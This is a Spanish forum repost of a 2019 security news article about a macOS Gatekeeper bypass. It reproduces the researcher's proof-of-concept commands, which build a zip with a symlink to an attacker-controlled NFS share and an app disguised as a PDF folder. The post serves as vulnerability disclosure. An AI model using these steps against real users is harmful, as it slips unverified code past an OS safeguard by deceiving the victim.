Foro Wanako1
¿Quieres reaccionar a este mensaje? Regístrate en el foro con unos pocos clics o inicia sesión para continuar.

Foro Wanako1

Programas Gratuitos, Desatendidos y Mucho más!!!
 
PortalPortal  ÍndiceÍndice  BuscarBuscar  Últimas imágenesÚltimas imágenes  ConectarseConectarse  RegistrarseRegistrarse  
Buscar
 
 

Resultados por:
 
Rechercher Búsqueda avanzada
Los posteadores más activos del mes
missyou123
Salto de restricciones en MacOS X GateKeeper Vote_lcapSalto de restricciones en MacOS X GateKeeper Voting_barSalto de restricciones en MacOS X GateKeeper Vote_rcap 
tano1221
Salto de restricciones en MacOS X GateKeeper Vote_lcapSalto de restricciones en MacOS X GateKeeper Voting_barSalto de restricciones en MacOS X GateKeeper Vote_rcap 
ПΣӨƧӨFƬ
Salto de restricciones en MacOS X GateKeeper Vote_lcapSalto de restricciones en MacOS X GateKeeper Voting_barSalto de restricciones en MacOS X GateKeeper Vote_rcap 
大†Shinegumi†大
Salto de restricciones en MacOS X GateKeeper Vote_lcapSalto de restricciones en MacOS X GateKeeper Voting_barSalto de restricciones en MacOS X GateKeeper Vote_rcap 
ℛeℙ@¢ᴋ€r
Salto de restricciones en MacOS X GateKeeper Vote_lcapSalto de restricciones en MacOS X GateKeeper Voting_barSalto de restricciones en MacOS X GateKeeper Vote_rcap 
ronaldinho424
Salto de restricciones en MacOS X GateKeeper Vote_lcapSalto de restricciones en MacOS X GateKeeper Voting_barSalto de restricciones en MacOS X GateKeeper Vote_rcap 
Engh3
Salto de restricciones en MacOS X GateKeeper Vote_lcapSalto de restricciones en MacOS X GateKeeper Voting_barSalto de restricciones en MacOS X GateKeeper Vote_rcap 
geodasoft
Salto de restricciones en MacOS X GateKeeper Vote_lcapSalto de restricciones en MacOS X GateKeeper Voting_barSalto de restricciones en MacOS X GateKeeper Vote_rcap 
Noviembre 2024
LunMarMiérJueVieSábDom
    123
45678910
11121314151617
18192021222324
252627282930 
CalendarioCalendario
Últimos temas
» Yum Audio Ember 1.0.0
Salto de restricciones en MacOS X GateKeeper EmptyHoy a las 4:43 am por missyou123

» YT Video Downloader 11.23
Salto de restricciones en MacOS X GateKeeper EmptyHoy a las 4:41 am por missyou123

» YT Saver 9.2.1 Multilingual
Salto de restricciones en MacOS X GateKeeper EmptyHoy a las 4:39 am por missyou123

» Thunderhead Pathfinder 2024.2.1120 (x64)
Salto de restricciones en MacOS X GateKeeper EmptyHoy a las 4:28 am por missyou123

» Thunderhead Engineering Ventus 2024.2.1120 (x64)
Salto de restricciones en MacOS X GateKeeper EmptyHoy a las 4:26 am por missyou123

» Thunderhead Engineering PyroSim 2024.2.1120 (x64)
Salto de restricciones en MacOS X GateKeeper EmptyHoy a las 4:24 am por missyou123

» SysTools Image Viewer Pro 5.0
Salto de restricciones en MacOS X GateKeeper EmptyHoy a las 4:22 am por missyou123

» Steinberg VST Live Pro 2.1.21 (x64)
Salto de restricciones en MacOS X GateKeeper EmptyHoy a las 4:18 am por missyou123

» SPATIAL CONSTRUX NCeptionExporter 1.0.0
Salto de restricciones en MacOS X GateKeeper EmptyHoy a las 4:12 am por missyou123

Sondeo
Visita de Paises
free counters
Free counters

Comparte | 
 

 Salto de restricciones en MacOS X GateKeeper

Ver el tema anterior Ver el tema siguiente Ir abajo 
AutorMensaje
tano1221
Miembro Mayor
Miembro Mayor
tano1221

Mensajes : 11244
Fecha de inscripción : 04/01/2016

Salto de restricciones en MacOS X GateKeeper Empty
MensajeTema: Salto de restricciones en MacOS X GateKeeper   Salto de restricciones en MacOS X GateKeeper EmptyMiér Mayo 29, 2019 11:44 am

Salto de restricciones en MacOS X GateKeeper Macos-gatekeeper

Salto de restricciones en MacOS X GateKeeper


Versiones de MacOS X anteriores a la 10.14.5 permitirían saltar las restricciones impuestas por Gatekeeper y ejecutar código no confiable sin necesidad de establecer permisos adicionales o notificar al usuario.


Estás aquí: Inicio / Vulnerabilidades / Salto de restricciones en MacOS X GateKeeper
Salto de restricciones en MacOS X GateKeeper
27 mayo, 2019 Por Francisco Salido Deja un comentario

Versiones de MacOS X anteriores a la 10.14.5 permitirían saltar las restricciones impuestas por Gatekeeper y ejecutar código no confiable sin necesidad de establecer permisos adicionales o notificar al usuario.


Gatekeeper es un mecanismo desarrollado por Apple e incluido en su sistema operativo para dispositivos de escritorio. Gatekeeper garantiza la verificación de aplicaciones descargadas desde terceros y obliga a los desarrolladores a firmar el código, evitando así que aplicaciones potencialmente fraudulentas se ejecuten sin el consentimiento del usuario.

El investigador de seguridad Filippo Cavallarin ha publicado en su página web una prueba de concepto en la que hace una demostración de una vulnerabilidad que permitiría a un atacante saltar esta protección y ejecutar código no verificado.

En su diseño, Gatekeeper considera las unidades externas y las redes compartidas como direcciones seguras y permite la ejecución de cualquier aplicación contenida en ellas. De forma legítima, Gatekeeper implementa dos características que combinadas, permitirían configurar el ataque: el auto-montado de carpetas en red y la posibilidad de que ficheros zip contengan enlaces simbólicos que apunten a direcciones arbitrarias.

Así, se podría pensar el siguiente escenario: un atacante elabora un fichero zip que contiene un enlace simbólico a una dirección controlada por el atacante, por ejemplo: Documents -> /net/atacante.com/Documents y lo envía a la víctima.

De esta forma, se ejecutaría el archivo en control del atacante, sin que Gatekeeper lo impida ni tan siquiera lo notifique.

De forma detallada, Filippo Cavallarin lo explica en la PoC publicada en su web:

Creación de fichero zip con el enlace simbólico
mkdir Documents
ln -s /net/linux-vm.local/nfs/Documents Documents/Documents
zip -ry Documents.zip Documents
Creación de la aplicación con el código a ejecutar
cp -r /Applications/Calculator.app PDF.app
echo -e ‘#!/bin/bash'»\n»‘open /Applications/iTunes.app’ > PDF.app/Contents/MacOS/Calculator
chmod +x PDF.app/Contents/MacOS/Calculator
rm PDF.app/Contents/Resources/AppIcon.icns
ln -s /System/Library/CoreServices/CoreTypes.bundle/Contents/Resources/GenericFolderIcon.icns PDF.app/Contents/Resources/AppIcon.icns
Creación de la carpeta de red donde irá la aplicación
ssh linux-vm.local
mkdir -p /nfs/Documents
echo ‘/nfs/Documents *(insecure,rw,no_root_squash,anonuid=1000,anongid=1000,async,nohide)’ >> /etc/exports
service nfs-kernel-server restart
scp -r mymac.local:PDF.app /nfs/Documents/
Alojamos el archivo zip en alguna localización remota, para que al descargarlo Gatekeeper lo ponga en «cuarentena».
A pesar de que Gatekeeper ha marcado el archivo para su comprobación, no se generará ninguna alerta y se ejecutará el código controlado por el atacante.
El fallo fue notificado el 22 de febrero de este año, sin embargo Apple todavía no ha publicado ningún parche oficial.

Más información:

MacOS X GateKeeper Bypass
https://www.fcvl.net/vulnerabilities/macosx-gatekeeper-bypass
Volver arriba Ir abajo
Engh3
Miembro Mayor
Miembro Mayor
Engh3

Mensajes : 9721
Fecha de inscripción : 08/12/2016

Salto de restricciones en MacOS X GateKeeper Empty
MensajeTema: Re: Salto de restricciones en MacOS X GateKeeper   Salto de restricciones en MacOS X GateKeeper EmptyMiér Dic 29, 2021 7:17 pm

Salto de restricciones en MacOS X GateKeeper Gato2B2022

Salto de restricciones en MacOS X GateKeeper Feliz-ano-nuevo-2022


Salto de restricciones en MacOS X GateKeeper Ccc81-feliz-ccccccano-2019
Volver arriba Ir abajo
 

Salto de restricciones en MacOS X GateKeeper

Ver el tema anterior Ver el tema siguiente Volver arriba 
Página 1 de 1.

 Temas similares

-
» Get Your Manuscript Past the Gatekeeper
» macOS Server 5.8 Multilingual macOS
» macOS Server 5.10 Multilingual macOS
» macOS Server 5.11.1 macOS
» iVI 4.740 macOS

Permisos de este foro:No puedes responder a temas en este foro.
Foro Wanako1 :: MAC Apple :: Ayuda, Tutoriales-